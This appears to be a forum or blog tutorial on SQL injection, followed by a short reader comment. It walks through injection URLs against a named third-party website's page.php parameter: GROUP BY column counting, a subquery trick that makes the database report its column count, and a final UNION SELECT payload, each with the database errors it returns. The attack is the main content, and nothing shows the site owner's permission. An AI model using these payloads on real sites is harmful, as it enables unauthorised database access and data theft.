first,explanation.
up to now,we got the column count with group/order by.
like this
Code:
http://www.marinaplast.com/page.php?id=13 group by 6Quote:(Unknown column '6' in 'group statement')
Code:
http://www.marinaplast.com/page.php?id=13 group by 5why its happening?
behind the url /page.php?id=13 there is a sql query
PHP Code:
SELECT * FROM pages WHERE id=13 /** if you dont know what it means,its time to learn sql.
http://www.w3schools.com/sql/default.asp **/
the union columns represent the columns in the same table.
http://www.w3schools.com/sql/sql_union.asp
for example,if the query is like this
PHP Code:
SELECT id,title,price,pic,type FROM pages WHERE id=13
PHP Code:
SELECT id,title,price,pic,type FROM pages WHERE id=13 UNION SELECT 1,2,3,4,5 now,after we understand,lets moving on.
we now the query behind our url is
PHP Code:
SELECT * FROM pages WHERE id=13 so lets count *
Code:
http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)but we didnt write the columns!
so it gives result of the columns in the table.
Code:
http://www.marinaplast.com/page.php?id=13 and (select * from pages)=(select 1)Quote:(Operand should contain 5 column(s))it means 5 columns
Code:
http://www.marinaplast.com/page.php?id=13 div 0 union select 1,2,3,4,5hope you learned something.
Injections are tricky, indeed. I launched my SQL learning like 3 weeks ago and I think I'm starting to understand the concepts pretty well, here's where I learn:
ReplyDeleteacademy.vertabelo.com